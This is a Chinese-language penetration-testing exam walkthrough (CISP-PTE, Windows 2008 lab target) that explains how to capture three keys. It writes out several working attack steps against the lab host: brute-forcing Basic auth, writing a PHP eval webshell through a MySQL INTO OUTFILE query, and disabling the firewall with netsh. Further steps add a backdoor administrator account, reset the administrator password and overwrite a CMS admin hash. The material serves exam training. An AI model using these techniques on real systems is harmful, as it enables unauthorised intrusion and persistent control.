CISP-PTE实操练习之综合题讲解（win2008）

文章目录

CISP-PTE实操练习之综合题讲解（win2008）
前言
一、win2008综合题讲解
- 1. 第一个key
- 2. 第二个Key
- 3. 第三个Key
二、修改网站密码登录后台
- 1. phpyadmin修改密码
- 2. 登录后台获取key
总结

前言

上两期把基础题的两套题都给大家仔细的讲解了，接下来给大家讲解一下综合题的解题方法，那这期PTE的讲解就结束了，下次就是开始内网渗透的学习了，大家要好好复习噢。

一、win2008综合题讲解

环境的话，暂时没有噢，这里就给大家讲解一下思路吧，此题的话就是存在有3个key，大家只需要拿到这3个key就可以了。

1. 第一个key

我以我的靶机ip为例，我靶机的ip地址是192.168.124.132

打开页面ip地址后，出现了需要登录认证的页面，我们随便输入登录看看，输入admin/123

登录失败，并且返回未授权认证的页面，说明的通过账号和密码才能登录进去查看任何页面。

这时，我们拿到一个域名ip，首先要做的是做端口扫描和目录扫描，以及网站扫描。

我们用nmap扫描端口
nmap -sS -p 1-20000 192.168.124.132

扫出来发现有80端口开放，3389开放，进一步我们要做目录扫描，看看有什么网站是存在的

我们打开御剑

当我们扫描时，会出现停止工作，那是因为没有通过授权，是无法扫描ip下的目录的，这里我们需要做的就是爆破账号密码，进行登录，我们可以使用弱口令字典进行爆破。

我们返回刚才那个扥估页面进行抓包

我们将其base64进行解码

点击Ctrl+shift+B进行解码

我们假设账号就是admin，密码是未知的，去爆破密码，我们设置一下参数。我们将认证的账号和密码的base64的值设置为爆破的参数。

在payload黄色处设置为以上的选择，选项的意思为迭代的意思
位置1添加上admin:

位置2添加密码字典，这里选择已经选择好的password.txt字典

这里还要注意一点，记得添加上Base64编码选项，下面的URL编码选项去掉，不要选上

然后开始爆破，就可以了

图中的长度不同，说明爆破出来了，我们解码看看

右键按以上步骤进行解码

看到密码就是admin:123456。我们进行登录，登录进去是一个dedecms页面，这时，第一个key就出来了。
我们就拿到key:abfcghsk了。

2. 第二个Key

http://admin:123456@192.168.124.133/

这时，我们在用御剑去扫描看一下，发现也扫不出来。这时我们就可以使用burp+御剑的字典一起做一下目录扫描看看

这时，我们抓包，进行爆破目录位置，将其中标黄的位置进行爆破，选择御剑的目录字典。

payload中选择御剑中的dir.txt字典

将下面的URL编码去掉

然后开始攻击

其中状态码为200都是打开的网址和目录，其中dede和phpmyadmin都是存在的，我们打开dede试试

打开是一个登录页面，我们尝试弱口令登录试试，输入admin，bbbb

成功登录了，但是没有什么有价值的东西，我们继续寻找key，我们登录数据库系统phpmyadmin试试

http://192.168.124.133/phpmyadmin/

弱口令登录试试，root/root。

成功登录了。根据提示，key7是在根目录下，我们的思路就是要上传一句话到数据库中，然后蚁剑连接，在根目录下寻找key。

我们选择MySQL数据库，选择SQL选项，执行SQL语句,，查看当前数据库的目录位置。

select @@datadir;

在C:\phpStudy\MySQL\data\目录下，根据以往的经验，网站根目录应该在C:\phpStudy\www目录下，我们就往根目录下写入一句话。

select “<?php eval($_POST['a']);?>” into outfile ‘c:/phpstudy/www/kl.php’;

我们就成功写入了一句话。我们打开一句话时，也没有报错，说明传上去了。
http://192.168.124.133/kl.php

这时我们拿蚁剑连接试试，选择base64，在请求消息那里填写认证信息
Authorizatio
Basic YWRtaW46MTIzNDU2

我们就连接上了

我们找到了key.txt文件。

打开文件后，成功找到了key。

3. 第三个Key

这最后一个key就在靶机的桌面上了，我们就要远程登录到对方的主机上，这时我们就要打开对方的3389端口和关闭防火墙。

我们上传3389.bat文件，用于打开远程登录的3389端口

这里显示上传成功了，我们打开终端运行起来。

这时我们就要关闭防火墙和创建用户进行远程登录，如果创建的用户权限不够，看不到桌面的东西的话，我们就得更改管理员的密码，进行登录获取key。我们一个一个尝试一下。

netsh advfirewall set allprofiles state off

新建用户和密码，且加入管理员组内
net user zhian 2000 /add
net localgroup administrators zhian /add

点击win+R，打开mstsc，打开远程登录

输入zhian，2000

打开桌面是这样的，什么也没有，说明新建的用户权限根本不够，我们只能修改管理员密码进行登录

net user administrator zsbkx1988!

我们连接成功了，key就在桌面上。

到这里个key都拿到了。

二、修改网站密码登录后台

这里作一下扩展，这种题型在我考试的时候就遇到了，我在这里就讲解一下解决方法

1. phpyadmin修改密码

我们首先登录phpyadmin，选择以下数据库
点击dede_admin，就会出现右边的账号和密码，但是密码是童年过MD5加密的。在考试的时候我们是不能连接外网的的，我们就需要修改密码，用自己的密码进行登录。

原来的密码是bbbb，我们将其x修改为aaaa，将其进行MD5加密后替换就可以了。点击右边的MD5 hash就可以了。

74b87337454200d4d33f80c4663dc5e5，但是这里是20位的，我们这个替换后的MD5是32位的，我们需要去前5后7，用来替换，替换后为：
337454200d4d33f80c46

2. 登录后台获取key

修改后密码为aaaa，我们尝试登录看看

我们就拿到了key:123456了。

总结

综合题到这里结束了，整个考试的知识点大概就这么多，大多还是得靠大家平时多练习，多去动手去实操，题目变化大，我们要灵活运用知识点去解题。接下来的文章会给大家分享一下内网渗透方面以及综合靶场渗透里面的知识了。大家要好好复习呀。